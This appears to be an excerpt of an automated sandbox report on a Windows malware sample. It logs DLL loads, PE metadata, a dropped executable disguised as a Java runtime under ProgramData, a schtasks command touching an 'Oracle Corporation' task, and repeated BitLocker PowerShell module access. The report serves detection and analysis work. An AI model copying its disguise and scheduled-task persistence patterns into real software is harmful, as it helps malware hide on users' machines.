Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: sE5IdDeTp2.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: sE5IdDeTp2.exe

Static file information: File size 1245320 > 1048576

Source: sE5IdDeTp2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sE5IdDeTp2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: sE5IdDeTp2.exe	Static PE information: section name: .00cfg
Source: dialer_java.exe.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099B1394 push qword ptr [00007FF6099E3004h]; ret	0_2_00007FF6099B1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A61394 push qword ptr [00007FF6E3A93004h]; ret	16_2_00007FF6E3A61403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A61394 push qword ptr [00007FF6E3A93004h]; ret	17_2_00007FF6E3A61403
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140001394 push qword ptr [00000001400B3004h]; ret	25_2_0000000140001403
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400035D2 push rax; ret	25_2_00000001400035D4
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400746B0 push rdi; retf	25_2_00000001400746B6
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400746CB push rdi; ret	25_2_00000001400746CC
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4A1394 push qword ptr [00007FF75B4D3004h]; ret	35_2_00007FF75B4A1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ECFF1394 push qword ptr [00007FF6ED023004h]; ret	49_2_00007FF6ECFF1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD51394 push qword ptr [00007FF71BD83004h]; ret	69_2_00007FF71BD51403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0EF1394 push qword ptr [00007FF7C0F23004h]; ret	83_2_00007FF7C0EF1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642721394 push qword ptr [00007FF642753004h]; ret	97_2_00007FF642721403

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Jump to dropped file

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

File created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
